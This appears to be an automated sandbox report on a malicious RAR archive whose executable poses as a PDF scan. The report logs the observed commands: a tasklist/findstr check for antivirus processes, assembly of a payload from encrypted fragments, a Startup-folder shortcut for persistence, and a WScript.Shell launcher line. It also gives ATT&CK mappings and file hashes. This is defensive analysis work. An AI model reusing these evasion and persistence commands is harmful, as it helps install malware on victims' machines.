Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeFile opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeFile opened: C:\Users\user\AppData\Local
Source: C:\Program Files\7-Zip\7zFM.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Program Files\7-Zip\7zFM.exe "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar"
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "venezuelalandscapesmeantposters" Tournaments
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & echo url="c:\users\user\appdata\local\nanosec cryptographics\nanocipher.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & exit
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & echo url="c:\users\user\appdata\local\nanosec cryptographics\nanocipher.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & exit
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7zO099FD947\??? ??????? 937463543.txt VolumeInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts1
Windows Management Instrumentation		1
Scripting		11
Process Injection		11
Masquerading		OS Credential Dumping1
Virtualization/Sandbox Evasion		Remote Services1
Clipboard Data		1
Non-Application Layer Protocol		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter		1
Registry Run Keys / Startup Folder		1
Registry Run Keys / Startup Folder		1
Virtualization/Sandbox Evasion		LSASS Memory2
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		1
DLL Side-Loading		11
Process Injection		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS12
System Information Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar3%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\185027\Spy.pif5%ReversingLabs
C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe8%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu
unknown
unknownfalse
    		unknown

    World Map of Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1546128
    Start date and time:2024-10-31 14:32:48 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:defaultwindowsinteractivecookbook.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:40
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    Analysis Mode:stream
    Analysis stop reason:Timeout
    Sample name:#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar
    renamed because original name is a hash value
    Original Sample Name: .rar
    Detection:MAL
    Classification:mal72.expl.evad.winRAR@51/17@2/0

    Warnings

    • Exclude process from analysis (whitelisted): dllhost.exe
    • Excluded IPs from analysis (whitelisted): 52.165.164.15
    • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtEnumerateKey calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.
    • VT rate limit hit for: #U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar

    Created / dropped Files

    C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js

    Download File
    Process:C:\Users\user\AppData\Local\Temp\185027\Spy.pif
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):181
    Entropy (8bit):4.6090879213581575
    Encrypted:false
    SSDEEP:
    MD5:4733FFA94D8D0C283610719300F94545
    SHA1:BF49C5F5CAEDE6D922CA346BA9D50DFF3159A850
    SHA-256:F8901D3B3DC3717BC1D18A342FA2520E395B1BC8E5B1567EB19DE9857D4BEFB6
    SHA-512:C244A6D807A2F7A884E96A5D0068D8D4D744585545EFDB8408BCF23A09C344A0E1D696D1D5A1960840A8BCCFA079ADED13AA270BEFD58AA35DE5ECA4487903B1
    Malicious:false
    Reputation:unknown
    Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\NanoSec Cryptographics\\NanoCipher.scr\" \"C:\\Users\\user\\AppData\\Local\\NanoSec Cryptographics\\o\"")

    C:\Users\user\AppData\Local\NanoSec Cryptographics\o (copy)

    Download File
    Process:C:\Users\user\AppData\Local\Temp\185027\Spy.pif
    File Type:data
    Category:dropped
    Size (bytes):0
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:
    MD5:CF5248A05D5201CB596BE18810555996
    SHA1:537010947EAB7BA675A99326BD9C3AF5D5CB1301
    SHA-256:D73BCC672158084ED5D6352648C58398AEBF5C7840ED7202C4991F8AA59EFFD7
    SHA-512:49AB322819C8D150B7C4AB4A6CD0DDCAC274E04545208E426C645E27C3742C407869B9B3185990E71BC85398F7B4B4D140F192005291CD59FA85254E86E87BEA
    Malicious:false
    Reputation:unknown
    Preview:.. ...C.87.j..{_..r.t...;.g...0.,q.~!..mVl..8.N{.}..{..J_q.9.1I..=.\.>.........+.,Cq.-...4...4.:..}...~g...Wjo. n..u..U.|....1,w..&....."..W0..ML.Q.o,........+.h....UcQ..;.$...........). L_.e....:U.B.pa..E...S3P...o. .:..o.:..$..G2..(0*;;...+aW...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rp...D.;.'.F...h.............p+....(.p+....(.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W.....`...;.....|p+......p+....(.m.........5...x..2).U.j....>..#.~......!.`|...l..)u-T..<,.......%=.'....|'.4....=._..G..._....[..}...X..I..b.x<......kxy(SRd.'N.e.S.fO%&9..{.$..\..;.6n..+q......K...<.....G...#t...WZB.mQ...?$...Hg.3b.0y.W..5...=q.Y.K...V...hI@.`Z@.$..2L

    C:\Users\user\AppData\Local\Temp\185027\H

    Download File
    Process:C:\Windows\SysWOW64\cmd.exe
    File Type:data
    Category:dropped
    Size (bytes):518748
    Entropy (8bit):7.999632035339632
    Encrypted:true
    SSDEEP:
    MD5:CF5248A05D5201CB596BE18810555996
    SHA1:537010947EAB7BA675A99326BD9C3AF5D5CB1301
    SHA-256:D73BCC672158084ED5D6352648C58398AEBF5C7840ED7202C4991F8AA59EFFD7
    SHA-512:49AB322819C8D150B7C4AB4A6CD0DDCAC274E04545208E426C645E27C3742C407869B9B3185990E71BC85398F7B4B4D140F192005291CD59FA85254E86E87BEA
    Malicious:false
    Reputation:unknown
    Preview:.. ...C.87.j..{_..r.t...;.g...0.,q.~!..mVl..8.N{.}..{..J_q.9.1I..=.\.>.........+.,Cq.-...4...4.:..}...~g...Wjo. n..u..U.|....1,w..&....."..W0..ML.Q.o,........+.h....UcQ..;.$...........). L_.e....:U.B.pa..E...S3P...o. .:..o.:..$..G2..(0*;;...+aW...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rp...D.;.'.F...h.............p+....(.p+....(.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W.....`...;.....|p+......p+....(.m.........5...x..2).U.j....>..#.~......!.`|...l..)u-T..<,.......%=.'....|'.4....=._..G..._....[..}...X..I..b.x<......kxy(SRd.'N.e.S.fO%&9..{.$..\..;.6n..+q......K...<.....G...#t...WZB.mQ...?$...Hg.3b.0y.W..5...=q.Y.K...V...hI@.`Z@.$..2L

    C:\Users\user\AppData\Local\Temp\185027\Spy.pif

    Download File
    Process:C:\Windows\SysWOW64\cmd.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:modified
    Size (bytes):893608
    Entropy (8bit):6.62028134425878
    Encrypted:false
    SSDEEP:
    MD5:18CE19B57F43CE0A5AF149C96AECC685
    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 5%
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe

    Download File
    Process:C:\Program Files\7-Zip\7zFM.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):1039137
    Entropy (8bit):7.970394348387481
    Encrypted:false
    SSDEEP:
    MD5:CBCB0FF5AA471E22A6B129196A556D97
    SHA1:B3DCA2CAC1624E6A8B318708C02376C1EB6AB784
    SHA-256:5C1CE789A60371E388881FFBE0311BD2829E5E8DBAF77506929E50638F22D866
    SHA-512:B98BB17994D5FDF38CB3A181BC15C3F64779AA33F7A508D1A9CE1E2AB1B1A2D9260C2DCDAF8C4F597738827A4DF6F906C55903DFDC0DA9216E3F656B8E0A73E0
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 8%
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@..........................P.......G....@.................................4........@..................h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2....@......................@..B................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Temp\7zO099FD947\??? ??????? 937463543.txt

    Download File
    Process:C:\Program Files\7-Zip\7zFM.exe
    File Type:Unicode text, UTF-8 text, with no line terminators
    Category:dropped
    Size (bytes):140
    Entropy (8bit):3.964343144957258
    Encrypted:false
    SSDEEP:
    MD5:948A0D1D0F9DA30F9BE7A35AA65A137A
    SHA1:0E6C97B082D315520B28BB181CA9A04B3C4D62B8
    SHA-256:87C63257C618595CBAA52E7F42DA73811187E9321DD386520DDE630E5CD8DE85
    SHA-512:AACB6370A8B27DA7219EE4D7F587668C6C6C190F87F33987C7D625C0098593CC808EE8B0A8D01F7C977F37EB2DC90081F211B0B4A1D6648509E14F9E489CE7D1
    Malicious:false
    Reputation:unknown
    Preview:... .......... ................ ........... ............ ... ....... 937463543

    C:\Users\user\AppData\Local\Temp\7zO099FD947\??? ??????? 937463543.txt:Zone.Identifier

    Download File
    Process:C:\Program Files\7-Zip\7zFM.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):26
    Entropy (8bit):3.95006375643621
    Encrypted:false
    SSDEEP:
    MD5:187F488E27DB4AF347237FE461A079AD
    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
    Malicious:false
    Reputation:unknown
    Preview:[ZoneTransfer]....ZoneId=0

    C:\Users\user\AppData\Local\Temp\Already

    Download File
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):98304
    Entropy (8bit):7.997836829981676
    Encrypted:true
    SSDEEP:
    MD5:FA1CC3AB4F5055541732DDD8D875C135
    SHA1:8872AE2A2F63DAB182ABA07342CC8190E6EC1DDE
    SHA-256:FD897C1E947BD3BADAB64F72349C08BFB6CD5787A3EB627578334315B1268395
    SHA-512:4D3482B63F143B64E6A134FA86A880FBA32FF04738E574C93FAB6A13E290BB5BEA5FD227CB0DA820660F5868EEC804697682B77F8FFFA8E3DC138BDD77D6E993
    Malicious:false
    Reputation:unknown
    Preview:..w@...=..,..`-..5.....J.Pc.p<whJ..,5...&.,..~%..`{.U.>./..EN......v.\..FS....[?d..P m\.A..~.....+K.d.%..Fj. *......t&tawt>n.a.D.>p9.3...G.}...UQ..B....l..+..j~].AE.$..o.......e.;....MN-$!.3...._,e...GI.$....V.m9l.nim.c......]*...yX..^..p...u}..y.Z.7..1~`...2...].n..h4..1....|..............H:Kuq.6.X.DN......s8<...S..5.g.^.).:.<1..k1.[.N>.(B....uF...nk...}....r.a.2...E.T....w.....i.z.{.Z........L...c..J.B..H...:.@..vws0..<.<R..<....e..9.IO....xJ..)...o...*}nq.0.".b.e.....M..I.q.1.$Bt.r.l.>R`.....M.....ec+.&...F..~7/.8d(..8..-.^.)5..@........Ro.....{0.....{dn.....Q....z.I....~%....v...N.Mt..}..jV..Y.../9/.g......".0.....o..G.W....R.G...,...z.>.....$. ..a....K..q.W...../Q...P7.......5\.....]....An.....=.]3"V..6..<&....x...q..k.BX..>O......B.&T}.$n.........)..-Y...O...$k.......C...D..G.x...n.I..(.c......Z.k9..]..v.....%..Z'w.d...0..N....&.{3#.q/.n.....Q5........... hbpd.....L|.>......@.....:.............;....(.9D..!d.#..DBMr.0.:.

    C:\Users\user\AppData\Local\Temp\Determined

    Download File
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):74752
    Entropy (8bit):7.997750754709227
    Encrypted:true
    SSDEEP:
    MD5:89E81DAB8000A2B73D9643E42A72DE15
    SHA1:6FAB41A9E7C5680070876B4CAB61C04F968C6572
    SHA-256:04E60272D87FEF156A62052EAE1C622C572DA81C26CD884BFE55E27C1C984A56
    SHA-512:F1B7274A630252DC34AF18FD01061EE2E32DFBAA86CDE6581ECF218474408C34FFA321B4A0037FEDFEA6909DAECE91B0429C4FBA89B8C48C6DF75AD58EF87B1E
    Malicious:false
    Reputation:unknown
    Preview:.U.\..k....G.].Z....0L.';.......>..a.R%....`Wz..R..R.aq..o .}aq.O_HK.s..%.in.......g.D.....3g..?.....!.rd......g....1-.B.DC........6....5.4z.0..J.S...e..W\.i;D$s......?^...}.C..R..X..Ip.!Cf.c?....9..`(.U.......qV.....7....u....-D'-.[.._.+..d/.2..m.5........9.f...\.?.........*#...aN..q......../bg.H.jK3:........._qK.F+*.P...y.T.%..I../..*.p.6UC.FE_:.>.M...7.........X...K.oJ..&..q........._.d...%_.u..h..g..].......2]..i?..s.y.b.*DU...`.K..jZd!...XO7ua...,&. ..Q.u.....AP..`I.@.Ik.)h...@.c.1D.\.v..W.....}..>.....$............Cz..aw.. .%.?.q-.U.i*....K..N?xs..4m..2...+.+.\..#..+k.t..?P. ..QF...;..cG._..v.1puu'.o.L. .u&.rA..%.....<f)o.+m.Y.....=5.."..D.M.z$......!.|........Wi...~9C.....J...q.I...^. {.\P...3x5...r.e.....W&l.Ez.A(.luM.R..@.!...s..z~...|w.}.B..'.O?......._<.}u2`.KBB.Sg.`@..=".m.$......! .x.+..A?{.b?.t.........h{.Z.`.%L.0.2.@..z.O..q&[.JiT#.'.t'.....>...b....3k8.XU._.W......?*..t"hiP....t[........Ek..JI.[.\(,..2...r..%H.........x...@...

    C:\Users\user\AppData\Local\Temp\Finnish

    Download File
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):87040
    Entropy (8bit):7.99786503957624
    Encrypted:true
    SSDEEP:
    MD5:451B264363660B3725CDFBC883227E38
    SHA1:6B695024901A21F973E82734434212E3C9C74133
    SHA-256:1FB0C5DB72F245600829D31A4987AED15A179F1157BAFB3C3AF86B56C36C5E73
    SHA-512:C15550CFF8DC14266C55FE94A66B9C6F16182669E0B606637A2267BF503C6CB270DE1BC806FD167480EE7691211F0ECB872ACA30C952A203C8421DE21AA1B5A4
    Malicious:false
    Reputation:unknown
    Preview:."..B.Y....z>.Y.........W'.O>K.i..#.M.1|f^".D.]#.f@..ck.....S..n.Z~...'........U.N' ~.... M..e..m)...U].............=.6..~<K...fT.(....}r21..... @L5..q.x...*`V..C..<.E.M.%.K..........y.4..:..$.6..;!....k'2.o...+....7#..E.6.W.......3.....4".l..I.W.Q..ag..Vd<..R.9......Ad.&%.b....w...C...n?....._.H.4s..P...QAQLg1JB.`1....Pr...V..ZA.,...........I.....^eQ.{...2$UE..g..}......t/?.z.....A...w.|x..$%........7.....q.7... {D%r.i...A...qz........z...]hC....|.......3.w.m..".hw......L:<V...h........bs.Tr.6.\...}..].*............}..e...F.l...Y.f.2+.%.ka.Q.e.:../[.,8MA.!.F.{..`..K..e.Q.V...A....3.X-..m;...]..;.u..h{.T.]eI.E.....v~...S~...~f.?.+]i._...D..=.....?.X..#..;W.m..s..p..UQO.Apwe.h.P?Eu.>...*e.3J.....&...^.....b.8......~..N6.1.<...T.......FZ=..b6...%2....4a. ..?......a.w.....+_Xkn.xE(.'D......xI..=.......\...|......"....3^..!.....VY.._/.w...X...(Q...t.,.%.Dh.];....hi...)\.......P.~L..oP..4.......94,4u...%{.rs.b.J...D.P..$..I...R......0.!j.>t.k.....

    C:\Users\user\AppData\Local\Temp\Hint

    Download File
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):42588
    Entropy (8bit):7.995385083436723
    Encrypted:true
    SSDEEP:
    MD5:95DE9DB271D3B485FF1C553FA44CD0A1
    SHA1:E02F7F27DD2F22107CA1B61E7829F07DD76879B6
    SHA-256:D2735070FDD4EAEED64282C742486DC33A4F6A757D940C2073B2A96C0D19B985
    SHA-512:967DDA38A5333E6004FB85FC337E76BE5C4F4EAFFE865EDC9558F361279437A5A0289C086E03EC0E48DFF4FCEF42DAFB0097BAB15F34590CD3F8EA4645531724
    Malicious:false
    Reputation:unknown
    Preview:.....&.<..b..`...Z.32...3.h.......... .v.t...b...#c.Jn^)....`.b...=~u/.|..R......../e..l.p...yE...2.,d$.e.{YL.p.;...r.....\........"....&....-lv.sV.-&...n._...6.HlU.,..../f)m..(6....B@.k*[.*+.....~fg.7Sh%...Xc..J/K......Y...k..qP..s.<.........o>..6..Lmr.w\.P...z ......[2....G.A5..8...E.+..'@n|.=.J.s....I..l.L.s..FH...'3mY..J....?O...R4t./.../...."..)......{.v....`........|.....>..A...d."L.f..k.e...:.....T#.;m.+....IL.m;0...%!m....hE..=K.iJ..c...@.)}....4o..M$Y......:...k&.C.T;f..K.wt..).)...-..n.n.LGl....B..!...4..:...+s....(...f).rg1..V2.A%.N.j,....3...U-4.0.0...C..m=..&_.....6V.j.].#.t.z.|.d.. b...K3h.c.../{...F...I{*....F..!/....l....g;..T._l.%.v..z..'f.d....S.&...c.!!...9.P.../..U....q<h.*B..P..p...a..=E....|...h.<'.w..q....k....!.o.0........YD.Ox-.d...~@6@1z..;k.x}y'...f....:X,.T.....+.cl..=.Y.&.d1..........R=.....9.h-Z..&.(Z'...~...'^.(D.h<..S. ..c.3...].......2.W..C^n....?.hW...r...m...o..P..?..j.3.....L....Pt#.j.hOQL.{.._T.O..q?.X....

    C:\Users\user\AppData\Local\Temp\Martin

    Download File
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):79872
    Entropy (8bit):7.997900445840888
    Encrypted:true
    SSDEEP:
    MD5:9E14B62B60B6D8DEFF595665714D21FB
    SHA1:FD2B5F9D546FB1181B2C3CF4F8E586AC60E469AA
    SHA-256:8DC24185E6F9691BD40730CBC52A0F28E3ECB338652AE6B172D52215FE84E4E2
    SHA-512:DF80B444B34E000A6CF76277A079ADA7D968E32FDD0728BF04810BFF78D709891CC2EDCD1446A24989593C246DFD34687F7B7481D132100CE4E19523FFA6A426
    Malicious:false
    Reputation:unknown
    Preview:.. ...C.87.j..{_..r.t...;.g...0.,q.~!..mVl..8.N{.}..{..J_q.9.1I..=.\.>.........+.,Cq.-...4...4.:..}...~g...Wjo. n..u..U.|....1,w..&....."..W0..ML.Q.o,........+.h....UcQ..;.$...........). L_.e....:U.B.pa..E...S3P...o. .:..o.:..$..G2..(0*;;...+aW...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rp...D.;.'.F...h.............p+....(.p+....(.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W.....`...;.....|p+......p+....(.m.........5...x..2).U.j....>..#.~......!.`|...l..)u-T..<,.......%=.'....|'.4....=._..G..._....[..}...X..I..b.x<......kxy(SRd.'N.e.S.fO%&9..{.$..\..;.6n..+q......K...<.....G...#t...WZB.mQ...?$...Hg.3b.0y.W..5...=q.Y.K...V...hI@.`Z@.$..2L

    C:\Users\user\AppData\Local\Temp\Organizing

    Download File
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):84992
    Entropy (8bit):7.997991765034814
    Encrypted:true
    SSDEEP:
    MD5:F79ED8CD25A0C0DF29B1E687D414B83F
    SHA1:5704CEA46FE8C6FFEFEC21DF2338D3405EC1F542
    SHA-256:9CA00221B738AF74CA71D637F22439B91D12E4C283E6F6CB7E58954EF83466F5
    SHA-512:CB5A9FF18E9EFC1F38216BD12CAC81787D354339558266435C42994F68A0DB06F64089B634B18257B2279A45613EAFF962BF16CA81EB3910E27762BCC1CA8365
    Malicious:false
    Reputation:unknown
    Preview:..0Q'.z.U....=......|........W....M......}.w......=Sl...R._cDX...w.C1.L...).^Thm..rL..@"..Ek*...=mHr.......Ifit1.2...$;....!.."%..1.i....7.../.#g 9z.s..e,..6.....T..#.O....G......!..Fo..t@._.>.`H:.;........O....w,.........?...$..G..i.._g...#..j.E}.......H..Q.....B.cK.B........k....Oi...&...5..n... ....&...V.mY..>.*.\......`.'\.....rD...2.Mnq.Oz.v...c..L...W/...Ay.F..V.QOZ.,.s..Q..$....a.RH!T....5u..B...B..CW..+mR..z?.....\....8.k@......3..'..G..|`....L........tu.9..(I.T^...K...y4.C.Z.9O.....-...'o!..... 7J.S."!..H..Kb...X.<.....;Yx3..vP.Cz.l...._.'>?.o..}GV..]........U....S>(....V.p.u....S...3&z..=CR.m*..&....#b.!.E....~.......X.b.._.C.....t.=^S.U.+.$.}m..e.M.B+."....!..92.z.k..1.N=]..}cC2..Q.e.w.LF..pb....dg.M......'.....mN..|.!E..2.].!r..QY]X(.~.2..F>"...Eh.sA.R.]..}.-.^.]..OQ.Zd.....\.....".b.|A...F..T&...O...(..y,5.7.x..Z.<..}A....^.....$..~ls.|...S.DK.\.g\..b...g.p......a...,.T...r......\...\.;.o.Z#.,./...i....g.....

    C:\Users\user\AppData\Local\Temp\Presentations

